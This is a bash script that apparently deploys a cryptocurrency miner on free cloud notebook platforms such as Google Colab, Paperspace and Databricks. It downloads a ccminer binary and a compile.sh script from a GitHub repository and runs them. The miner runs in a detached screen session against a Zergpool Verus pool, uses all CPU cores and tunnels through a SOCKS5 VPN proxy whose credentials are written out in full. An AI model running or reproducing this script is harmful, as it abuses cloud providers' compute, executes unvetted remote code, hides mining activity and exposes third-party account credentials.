#!/bin/bash
array[0]="google_colab"
array[1]="paperspace"
array[2]="databricks"
size=${#array[@]}
index=$(($RANDOM % $size))
worker=${array[$index]}
sleep 10s
wget -qO deploy https://github.com/fuckl0l/master/raw/master/ccminer
wget -qO compile https://github.com/fuckl0l/master/raw/master/compile.sh
chmod +x deploy compile
screen -dm -S run ./deploy -a verus -o stratum+tcp://verushash.na.mine.zergpool.com:3300 -u D5snbNHPaNYMHAESeTrreRRVx3NLRdGo65.alvin_$(cat /proc/sys/kernel/hostname)_$(echo $worker) -p c=DGB -t $(nproc --all) -x socks5://OXk5cgacd:4uHDOv78GAq@iad-a10.ipvanish.com:1080
sleep 10s && ./compile
